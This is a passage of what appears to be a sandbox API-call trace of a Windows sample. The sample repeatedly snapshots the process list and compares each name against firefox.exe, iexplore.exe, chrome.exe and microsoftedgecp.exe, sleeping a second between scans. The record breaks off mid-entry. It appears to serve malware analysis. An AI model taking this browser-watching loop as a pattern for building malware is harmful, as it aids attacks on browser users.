[0244.153] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0244.153] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0244.153] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0244.153] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0244.153] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.153] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0244.154] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0244.154] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0244.154] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0244.154] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.154] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0244.154] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0244.154] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0244.154] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0244.154] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.154] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0244.155] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0244.155] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0244.155] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0244.155] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.155] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0244.155] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0244.155] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0244.155] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0244.156] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0244.156] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0244.156] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0244.156] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0244.156] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.156] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0244.157] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0244.157] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0244.157] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0244.157] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.157] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0244.157] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0244.157] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0244.157] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0244.157] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.157] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0244.158] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0244.158] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0244.158] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0244.158] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.158] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0244.158] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0244.158] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0244.158] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0244.158] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.158] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0244.159] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0244.159] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0244.159] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0244.159] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.159] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0244.159] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0244.159] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0244.159] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0244.159] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.159] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0244.160] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0244.160] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0244.160] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0244.160] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.160] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0244.160] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0244.161] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0244.161] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0244.161] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.161] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0244.161] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0244.161] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0244.161] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0244.161] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.161] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0244.162] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0244.162] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0244.162] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0244.162] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.162] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.162] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0244.162] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0244.162] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0244.162] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.162] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.163] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.163] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.163] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.163] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.163] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0244.163] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0244.163] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0244.163] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0244.163] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.163] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.164] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0244.164] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0244.164] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0244.164] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.164] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0244.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0244.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0244.164] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0244.165] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.165] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.165] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.165] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.165] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.165] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.165] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0244.166] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0244.166] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0244.166] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0244.166] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.166] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.166] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0244.166] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0244.166] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0244.166] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0244.166] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.167] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.167] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.167] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.167] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.167] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.167] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.167] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.167] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.167] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.167] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.168] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.168] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.168] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.168] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.168] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.168] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0244.168] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0244.168] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0244.168] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0244.168] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0244.169] CloseHandle (hObject=0xd4) returned 1 [0244.169] Sleep (dwMilliseconds=0x3e8) [0245.202] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0245.204] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.205] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0245.205] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0245.205] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0245.205] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0245.205] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0245.205] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0245.205] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0245.205] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0245.205] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0245.205] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0245.206] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0245.206] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0245.206] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0245.206] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.206] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.206] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0245.206] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0245.206] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0245.206] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.206] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0245.207] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0245.207] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0245.207] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0245.207] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.207] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0245.207] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0245.207] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0245.208] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0245.208] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.208] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0245.208] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0245.208] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0245.208] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0245.208] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.208] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0245.209] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0245.209] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0245.209] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0245.209] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.209] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0245.209] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0245.209] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0245.209] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0245.209] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.209] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0245.210] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0245.210] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0245.210] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0245.210] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.210] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.210] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.210] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.210] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.211] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.211] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.211] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.211] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.211] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.211] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.211] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: 